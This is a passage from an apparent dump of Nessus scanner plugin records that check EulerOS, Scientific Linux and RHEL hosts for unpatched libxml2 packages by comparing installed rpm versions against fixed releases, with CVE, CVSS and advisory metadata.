Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1089\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0348b98\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libxml2 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libxml2-2.9.1-6.3.h10\",\n \"libxml2-devel-2.9.1-6.3.h10\",\n \"libxml2-python-2.9.1-6.3.h10\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:58:26", "description": "* libxml2: Use after free triggered by XPointer paths beginning 
with range-to * libxml2: Use after free in xmlXPathCompOpEvalPositionalPredicate() function in xpath.c * libxml2:\nDoS caused by incorrect error detection during XZ decompression * libxml2: NULL pointer dereference in xmlXPathCompOpEval() function in xpath.c * libxml2: Unrestricted memory usage in xz_head() function in xzlib.c * libxml2: Infinite loop caused by incorrect error detection during LZMA decompression", "cvss3": {}, "published": "2020-04-21T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : libxml2 on SL7.x x86_64 (20200407)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8035", "CVE-2016-5131", "CVE-2017-15412", "CVE-2017-18258", "CVE-2018-14404", "CVE-2018-14567"], "modified": "2020-04-24T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:libxml2", "p-cpe:/a:fermilab:scientific_linux:libxml2-debuginfo", "p-cpe:/a:fermilab:scientific_linux:libxml2-devel", "p-cpe:/a:fermilab:scientific_linux:libxml2-python", "p-cpe:/a:fermilab:scientific_linux:libxml2-static", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20200407_LIBXML2_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/135819", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(135819);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/04/24\");\n\n script_cve_id(\"CVE-2015-8035\", \"CVE-2016-5131\", \"CVE-2017-15412\", \"CVE-2017-18258\", \"CVE-2018-14404\", \"CVE-2018-14567\");\n\n script_name(english:\"Scientific Linux Security Update : libxml2 on SL7.x x86_64 (20200407)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"* libxml2: 
Use after free triggered by XPointer paths beginning with\nrange-to * libxml2: Use after free in\nxmlXPathCompOpEvalPositionalPredicate() function in xpath.c * libxml2:\nDoS caused by incorrect error detection during XZ decompression *\nlibxml2: NULL pointer dereference in xmlXPathCompOpEval() function in\nxpath.c * libxml2: Unrestricted memory usage in xz_head() function in\nxzlib.c * libxml2: Infinite loop caused by incorrect error detection\nduring LZMA decompression\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind2004&L=SCIENTIFIC-LINUX-ERRATA&P=12531\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?988a1301\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libxml2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:libxml2-static\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/07\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libxml2-2.9.1-6.el7.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libxml2-debuginfo-2.9.1-6.el7.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libxml2-devel-2.9.1-6.el7.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libxml2-python-2.9.1-6.el7.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"libxml2-static-2.9.1-6.el7.4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2 / libxml2-debuginfo / libxml2-devel / libxml2-python / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-26T14:19:07", "description": "The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2020:1190 advisory.\n\n - libxml2: DoS caused by incorrect error detection during XZ decompression (CVE-2015-8035)\n\n - libxml2: Use after free triggered by XPointer paths beginning with range-to (CVE-2016-5131)\n\n - libxml2: Use after free in xmlXPathCompOpEvalPositionalPredicate() function in xpath.c (CVE-2017-15412)\n\n - libxml2: Unrestricted memory usage in xz_head() function in xzlib.c (CVE-2017-18258)\n\n - libxml2: NULL 
pointer dereference in xmlXPathCompOpEval() function in xpath.c (CVE-2018-14404)\n\n - libxml2: Infinite loop caused by incorrect error detection during LZMA decompression (CVE-2018-14567)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-04-01T00:00:00", "type": "nessus", "title": "RHEL 7 : libxml2 (RHSA-2020:1190)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-8035", "CVE-2016-5131", "CVE-2017-15412", "CVE-2017-18258", "CVE-2018-14404", "CVE-2018-14567"], "modified": "2023-05-25T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:libxml2", "p-cpe:/a:redhat:enterprise_linux:libxml2-devel", "p-cpe:/a:redhat:enterprise_linux:libxml2-python", "p-cpe:/a:redhat:enterprise_linux:libxml2-static"], "id": "REDHAT-RHSA-2020-1190.NASL", "href": "https://www.tenable.com/plugins/nessus/135071", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2020:1190. 
The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135071);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/25\");\n\n script_cve_id(\n \"CVE-2015-8035\",\n \"CVE-2016-5131\",\n \"CVE-2017-15412\",\n \"CVE-2017-18258\",\n \"CVE-2018-14404\",\n \"CVE-2018-14567\"\n );\n script_bugtraq_id(\n 77390,\n 92053,\n 102098,\n 105198\n );\n script_xref(name:\"RHSA\", value:\"2020:1190\");\n script_xref(name:\"IAVB\", value:\"2016-B-0083-S\");\n script_xref(name:\"IAVB\", value:\"2016-B-0113-S\");\n script_xref(name:\"IAVB\", value:\"2017-B-0169-S\");\n\n script_name(english:\"RHEL 7 : libxml2 (RHSA-2020:1190)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2020:1190 advisory.\n\n - libxml2: DoS caused by incorrect error detection during XZ decompression (CVE-2015-8035)\n\n - libxml2: Use after free triggered by XPointer paths beginning with range-to (CVE-2016-5131)\n\n - libxml2: Use after free in xmlXPathCompOpEvalPositionalPredicate() function in xpath.c (CVE-2017-15412)\n\n - libxml2: Unrestricted memory usage in xz_head() function in xzlib.c (CVE-2017-18258)\n\n - libxml2: NULL pointer dereference in xmlXPathCompOpEval() function in xpath.c (CVE-2018-14404)\n\n - libxml2: Infinite loop caused by incorrect error detection during LZMA decompression (CVE-2018-14567)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2015-8035\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://access.redhat.com/security/cve/CVE-2016-5131\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2017-15412\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2017-18258\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2018-14404\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2018-14567\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:1190\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1277146\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1358641\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1523128\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1566749\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1595985\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1619875\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-15412\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(252, 400, 476);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/11/02\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2020/03/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libxml2-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libxml2-static\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"redhat_repos.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/RedHat/release');\nif (isnull(os_release) || 'Red Hat' >!< os_release) audit(AUDIT_OS_NOT, 'Red Hat');\nvar os_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '7')) audit(AUDIT_OS_NOT, 'Red Hat 7.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu && 'ppc' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nvar constraints = [\n {\n 'repo_relative_urls': [\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/debug',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/optional/debug',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/optional/os',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/optional/source/SRPMS',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/os',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/source/SRPMS',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/supplementary/debug',\n 'content/dist/rhel-alt/server/7/7Server/power9/ppc64le/supplementary/source/SRPMS',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/debug',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/optional/debug',\n 
'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/optional/os',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/optional/source/SRPMS',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/os',\n 'content/dist/rhel-alt/server/7/7Server/system-z-a/s390x/source/SRPMS',\n 'content/dist/rhel/client/7/7Client/x86_64/debug',\n 'content/dist/rhel/client/7/7Client/x86_64/optional/debug',\n 'content/dist/rhel/client/7/7Client/x86_64/optional/os',\n 'content/dist/rhel/client/7/7Client/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/client/7/7Client/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/client/7/7Client/x86_64/os',\n 'content/dist/rhel/client/7/7Client/x86_64/source/SRPMS',\n 'content/dist/rhel/client/7/7Client/x86_64/supplementary/debug',\n 'content/dist/rhel/client/7/7Client/x86_64/supplementary/os',\n 'content/dist/rhel/client/7/7Client/x86_64/supplementary/source/SRPMS',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/debug',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/optional/debug',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/optional/os',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/os',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/source/SRPMS',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/supplementary/debug',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/supplementary/os',\n 'content/dist/rhel/computenode/7/7ComputeNode/x86_64/supplementary/source/SRPMS',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/debug',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/highavailability/debug',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/highavailability/os',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/highavailability/source/SRPMS',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/optional/debug',\n 
'content/dist/rhel/power-le/7/7Server/ppc64le/optional/os',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/optional/source/SRPMS',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/os',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/resilientstorage/debug',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/resilientstorage/os',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/resilientstorage/source/SRPMS',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/sap-hana/debug',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/sap-hana/os',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/sap-hana/source/SRPMS',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/sap/debug',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/sap/os',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/sap/source/SRPMS',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/source/SRPMS',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/supplementary/debug',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/supplementary/os',\n 'content/dist/rhel/power-le/7/7Server/ppc64le/supplementary/source/SRPMS',\n 'content/dist/rhel/power/7/7Server/ppc64/debug',\n 'content/dist/rhel/power/7/7Server/ppc64/optional/debug',\n 'content/dist/rhel/power/7/7Server/ppc64/optional/os',\n 'content/dist/rhel/power/7/7Server/ppc64/optional/source/SRPMS',\n 'content/dist/rhel/power/7/7Server/ppc64/os',\n 'content/dist/rhel/power/7/7Server/ppc64/sap/debug',\n 'content/dist/rhel/power/7/7Server/ppc64/sap/os',\n 'content/dist/rhel/power/7/7Server/ppc64/sap/source/SRPMS',\n 'content/dist/rhel/power/7/7Server/ppc64/source/SRPMS',\n 'content/dist/rhel/power/7/7Server/ppc64/supplementary/debug',\n 'content/dist/rhel/power/7/7Server/ppc64/supplementary/os',\n 'content/dist/rhel/power/7/7Server/ppc64/supplementary/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/highavailability/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/highavailability/os',\n 
'content/dist/rhel/server/7/7Server/x86_64/highavailability/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/nfv/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/nfv/os',\n 'content/dist/rhel/server/7/7Server/x86_64/nfv/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/optional/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/optional/os',\n 'content/dist/rhel/server/7/7Server/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/server/7/7Server/x86_64/os',\n 'content/dist/rhel/server/7/7Server/x86_64/resilientstorage/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/resilientstorage/os',\n 'content/dist/rhel/server/7/7Server/x86_64/resilientstorage/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/rt/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/rt/os',\n 'content/dist/rhel/server/7/7Server/x86_64/rt/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/sap-hana/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/sap-hana/os',\n 'content/dist/rhel/server/7/7Server/x86_64/sap-hana/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/sap/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/sap/os',\n 'content/dist/rhel/server/7/7Server/x86_64/sap/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/source/SRPMS',\n 'content/dist/rhel/server/7/7Server/x86_64/supplementary/debug',\n 'content/dist/rhel/server/7/7Server/x86_64/supplementary/os',\n 'content/dist/rhel/server/7/7Server/x86_64/supplementary/source/SRPMS',\n 'content/dist/rhel/system-z/7/7Server/s390x/debug',\n 'content/dist/rhel/system-z/7/7Server/s390x/highavailability/debug',\n 'content/dist/rhel/system-z/7/7Server/s390x/highavailability/os',\n 'content/dist/rhel/system-z/7/7Server/s390x/highavailability/source/SRPMS',\n 'content/dist/rhel/system-z/7/7Server/s390x/optional/debug',\n 'content/dist/rhel/system-z/7/7Server/s390x/optional/os',\n 
'content/dist/rhel/system-z/7/7Server/s390x/optional/source/SRPMS',\n 'content/dist/rhel/system-z/7/7Server/s390x/os',\n 'content/dist/rhel/system-z/7/7Server/s390x/resilientstorage/debug',\n 'content/dist/rhel/system-z/7/7Server/s390x/resilientstorage/os',\n 'content/dist/rhel/system-z/7/7Server/s390x/resilientstorage/source/SRPMS',\n 'content/dist/rhel/system-z/7/7Server/s390x/sap/debug',\n 'content/dist/rhel/system-z/7/7Server/s390x/sap/os',\n 'content/dist/rhel/system-z/7/7Server/s390x/sap/source/SRPMS',\n 'content/dist/rhel/system-z/7/7Server/s390x/source/SRPMS',\n 'content/dist/rhel/system-z/7/7Server/s390x/supplementary/debug',\n 'content/dist/rhel/system-z/7/7Server/s390x/supplementary/os',\n 'content/dist/rhel/system-z/7/7Server/s390x/supplementary/source/SRPMS',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/debug',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/optional/debug',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/optional/os',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/optional/source/SRPMS',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/oracle-java-rm/os',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/os',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/source/SRPMS',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/supplementary/debug',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/supplementary/os',\n 'content/dist/rhel/workstation/7/7Workstation/x86_64/supplementary/source/SRPMS',\n 'content/fastrack/rhel/client/7/x86_64/debug',\n 'content/fastrack/rhel/client/7/x86_64/optional/debug',\n 'content/fastrack/rhel/client/7/x86_64/optional/os',\n 'content/fastrack/rhel/client/7/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/client/7/x86_64/os',\n 'content/fastrack/rhel/client/7/x86_64/source/SRPMS',\n 'content/fastrack/rhel/computenode/7/x86_64/debug',\n 'content/fastrack/rhel/computenode/7/x86_64/optional/debug',\n 
'content/fastrack/rhel/computenode/7/x86_64/optional/os',\n 'content/fastrack/rhel/computenode/7/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/computenode/7/x86_64/os',\n 'content/fastrack/rhel/computenode/7/x86_64/source/SRPMS',\n 'content/fastrack/rhel/power/7/ppc64/debug',\n 'content/fastrack/rhel/power/7/ppc64/optional/debug',\n 'content/fastrack/rhel/power/7/ppc64/optional/os',\n 'content/fastrack/rhel/power/7/ppc64/optional/source/SRPMS',\n 'content/fastrack/rhel/power/7/ppc64/os',\n 'content/fastrack/rhel/power/7/ppc64/source/SRPMS',\n 'content/fastrack/rhel/server/7/x86_64/debug',\n 'content/fastrack/rhel/server/7/x86_64/highavailability/debug',\n 'content/fastrack/rhel/server/7/x86_64/highavailability/os',\n 'content/fastrack/rhel/server/7/x86_64/highavailability/source/SRPMS',\n 'content/fastrack/rhel/server/7/x86_64/optional/debug',\n 'content/fastrack/rhel/server/7/x86_64/optional/os',\n 'content/fastrack/rhel/server/7/x86_64/optional/source/SRPMS',\n 'content/fastrack/rhel/server/7/x86_64/os',\n 'content/fastrack/rhel/server/7/x86_64/resilientstorage/debug',\n 'content/fastrack/rhel/server/7/x86_64/resilientstorage/os',\n 